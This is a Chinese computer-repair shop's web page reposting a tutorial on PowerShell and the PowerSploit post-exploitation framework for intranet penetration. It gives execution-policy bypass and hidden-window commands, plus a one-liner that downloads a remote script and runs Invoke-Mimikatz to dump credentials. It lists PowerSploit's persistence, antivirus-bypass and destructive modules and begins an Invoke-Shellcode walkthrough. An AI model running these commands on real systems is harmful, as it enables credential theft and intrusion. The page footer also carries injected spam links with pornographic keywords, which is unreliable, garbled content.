錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
[安全]解析在內網Powersploit滲透中的使用

作者: 佚名  日期:2017-04-14 07:35:07   來源: 本站整理

一.Powershell

我們先來說說powershell,PowerShell 是運行在 Windows上實現系統和應用程序管理自動化的命令行腳本環境。你可以把它看成是命令行提示符 cmd.exe 的擴充,或是顛覆。Powershell需要.NET環境的支持,同時支持.NET對象。其可讀性,易用性,可以位居當前所有 shell 之首。

這是別人說的,不過稍微研究下覺得,哇塞,這東西真的挺牛的,除了語法麻煩以外,剩下都挺好,不過語法麻煩讓我們這種英文不好的人怎么玩啊

當前 PowerShell 有五個版本,分別為 1.0,2.0,3.0,4.0,5.0

當時看別人的文章都說是有四個版本,但是我打開windows10看一眼,恩,微軟更新了,windows10自帶的5.(好幾)的版本啊

先來看看他的基本命令:

 新建目錄 New-Item whitecellclub -ItemType Directory

 新建文件 New-Item light.txt -ItemType File

 刪除目錄 Remove-Item whitecellclub

 顯示文本內容 Get-Content light.txt

 設置文本內容 Set-Content light.txt -Value “i love light so much”

 追加內容 Add-Content light.txt -Value “but i love you more”

 清除內容 Clear-Content light.txt

看看吧,什么感覺,你還喜歡他么?

不過好在,微軟也想到了這個問題,我們可以用windows下的命令跟Linux下的命令,比如:

這里說一下,我們怎么看我們powershell的版本,

Get-Host

這個是虛擬機的win7,所以是2.0的版本

powershell還有一些比較叼的用法:

本地權限繞過執行

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

本地隱藏權限繞過執行腳本

PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive
-NoProfile -WindowStyle Hidden(隱藏窗口) -File xxx.ps1

直接用IEX下載遠程的PS1腳本回來權限繞過執行

powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-
Mimikatz -DumpCreds"

我們可以來試一下:

這個命令是可以看到我們的版本的

完美繞過!(ps:這里說一下,ps1結尾的是powershell腳本,大家可以自己去研究下,我這里就不在贅述了,因為我也不會寫這種腳本)

二. Powersploit

介紹完了,我們開始我們的正題吧 Powersploit在內網滲透中的使用

powersploit一款基于powershell的后滲透(Post-Exploitation)框架,集成大量滲透相關模塊和功能。

github地址: https://github.com/mattifestation/PowerSploit

這里才是重點,我們開始吧:

首先,我在我本機上下載這個腳本文件

ps:我本機用的是ubuntu,所以我這里就用ubuntu代替kali的操作

下載完成之后,我們把我們下載的文件放到apache目錄小,讓我們可以遠程下載,然后啟動apache

service apache2 start

然后我們訪問我們的127.0.0.1  保證我們可以訪問的到

他的目錄就跟metasploit一樣,分工明確

CodeExecution 在目標主機執行代碼

ScriptModification 在目標主機上創建或修改腳本

Persistence 后門腳本(持久性控制)

AntivirusBypass 發現殺軟查殺特征

Exfiltration 目標主機上的信息搜集工具

Mayhem 藍屏等破壞性腳本

Recon 以目標主機為跳板進行內網信息偵查

(1). Invoke-Shellcode

我們使用 Invoke-Shellcode

Invoke-Shellcode的作用:將shellcode插入您選擇的進程ID或本地PowerShell中。

Invoke-Shellcode配合上metasploit,可以達到意想不到的效果

現在主機上下載我們的腳本(當然,你也可以直接從github上去下載,也可以從我們本機下載)

IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecution/Invoke--Shellcode.ps1")


熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 亚洲va无码手机在线电影| 老司机亚洲精品影院无码| 亚洲AV无码专区在线电影成人 | 久久青草亚洲AV无码麻豆 | 中日韩精品无码一区二区三区| 无码av人妻一区二区三区四区| 国产在线精品无码二区二区| 无码人妻久久一区二区三区免费 | 潮喷大喷水系列无码久久精品| 国产成人无码久久久精品一| 无码一区18禁3D| 久久久久久国产精品免费无码| 精品无码黑人又粗又大又长| 无码人妻一区二区三区一 | 久久人午夜亚洲精品无码区| 亚洲AV无码第一区二区三区| 亚洲高清无码在线观看| 亚洲日韩国产二区无码 | 永久免费av无码网站韩国毛片| 13小箩利洗澡无码视频网站免费 | 久久久久无码国产精品不卡| 丰满熟妇人妻Av无码区| 亚洲a无码综合a国产av中文| 亚洲日韩乱码中文无码蜜桃| 无码人妻黑人中文字幕| 国产精品99精品无码视亚| 秋霞鲁丝片无码av| 人妻系列无码专区久久五月天| 亚洲aⅴ天堂av天堂无码麻豆| 精品无码一区二区三区亚洲桃色| 国产AV无码专区亚洲Av| 中文无码熟妇人妻AV在线 | 人妻少妇伦在线无码专区视频| 国产色综合久久无码有码 | 日韩人妻无码精品系列| 人妻无码一区二区三区四区| 无码 免费 国产在线观看91| 无码国产亚洲日韩国精品视频一区二区三区 | 亚洲精品无码日韩国产不卡av| 久久久久亚洲精品无码系列| 亚洲AV无码久久精品成人 |